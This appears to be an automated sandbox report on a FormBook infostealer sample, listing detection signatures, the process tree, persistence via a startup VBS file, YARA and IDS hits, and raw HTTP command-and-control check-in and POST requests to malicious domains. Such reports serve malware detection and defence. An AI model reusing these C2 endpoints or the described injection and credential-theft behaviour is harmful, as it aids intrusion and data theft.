
Windows Analysis Report
25Lz840Dmh.exe

Overview

General Information

Sample name: 25Lz840Dmh.exe (renamed because the original name is a hash value)
Original sample name: 232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c.exe
Analysis ID: 1588079
MD5: 6c35b069b37095a1788e5c7b51a60e97
SHA1: 3b36ef6c51bb8094729bae419675a2aa21bc6d23
SHA256: 232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 25Lz840Dmh.exe (PID: 720 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
    • fricandeaus.exe (PID: 4480 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
      • svchost.exe (PID: 788 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • LHSqcaLVnKQk.exe (PID: 1280 cmdline: "C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • mobsync.exe (PID: 2384 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
            • LHSqcaLVnKQk.exe (PID: 7088 cmdline: "C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1832 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 1240 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • fricandeaus.exe (PID: 3284 cmdline: "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
      • svchost.exe (PID: 1660 cmdline: "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(4 further entries not shown)

Source | Rule | Description | Author | Strings
9.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
13.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
13.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , ProcessId: 1240, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ParentImage: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ParentProcessId: 4480, ParentProcessName: fricandeaus.exe, ProcessCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ProcessId: 788, ProcessName: svchost.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , ProcessId: 1240, ProcessName: wscript.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ParentImage: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ParentProcessId: 4480, ParentProcessName: fricandeaus.exe, ProcessCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ProcessId: 788, ProcessName: svchost.exe

                    Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ProcessId: 4480, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T21:07:05.933875+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50255 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:34.215997+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50259 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:56.497863+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50263 | 8.217.17.192 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T21:07:26.470361+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50256 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:29.036634+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50257 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:31.571060+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50258 | 3.33.130.190 | 80 | TCP
2025-01-10T21:07:48.290034+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50260 | 8.217.17.192 | 80 | TCP
2025-01-10T21:07:50.866665+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50261 | 8.217.17.192 | 80 | TCP
2025-01-10T21:07:53.386866+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50262 | 8.217.17.192 | 80 | TCP


                    AV Detection

Source: http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | ReversingLabs: Detection: 73%
Source: 25Lz840Dmh.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Joe Sandbox ML: detected
Source: 25Lz840Dmh.exe | Joe Sandbox ML: detected
Source: 25Lz840Dmh.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHSqcaLVnKQk.exe, 0000000E.00000002.2539118267.00000000002EE000.00000002.00000001.01000000.00000008.sdmp, LHSqcaLVnKQk.exe, 00000012.00000002.2539220837.00000000002EE000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C5445A
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5C6D1 FindFirstFileW,FindClose,5_2_00C5C6D1
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C5C75C
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5EF95
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5F0F2
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5F3F3
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C537EF
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C53B12
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5BCBC
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015445A GetFileAttributesW,FindFirstFileW,FindClose,7_2_0015445A
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015C6D1 FindFirstFileW,FindClose,7_2_0015C6D1
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0015C75C
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015EF95
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015F0F2
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015F3F3
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_001537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_001537EF
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_00153B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00153B12
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0015BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015BCBC

                    Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50263 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50260 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50258 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50259 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50257 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50256 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50261 -> 8.217.17.192:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50255 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50262 -> 8.217.17.192:80
                    Source: DNS query: www.medicaresbasics.xyz
Source: global traffic | TCP traffic: 192.168.2.7:50250 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 8.217.17.192
Source: Joe Sandbox View | IP Address: 3.33.130.190
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C622EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_00C622EE
Source: global traffic | HTTP traffic detected:
    GET /0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 HTTP/1.1
    Host: www.arcare.partners
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic | HTTP traffic detected:
    GET /fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 HTTP/1.1
    Host: www.medicaresbasics.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic | HTTP traffic detected:
    GET /ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 HTTP/1.1
    Host: www.meliorahomes.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Source: global traffic | DNS traffic detected: DNS query: www.arcare.partners
Source: global traffic | DNS traffic detected: DNS query: www.medicaresbasics.xyz
Source: global traffic | DNS traffic detected: DNS query: www.resellnexa.shop
Source: global traffic | DNS traffic detected: DNS query: www.meliorahomes.net
Source: unknown | HTTP traffic detected:
    POST /fm31/ HTTP/1.1
    Host: www.medicaresbasics.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Origin: http://www.medicaresbasics.xyz
    Referer: http://www.medicaresbasics.xyz/fm31/
    Cache-Control: no-cache
    Content-Length: 220
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
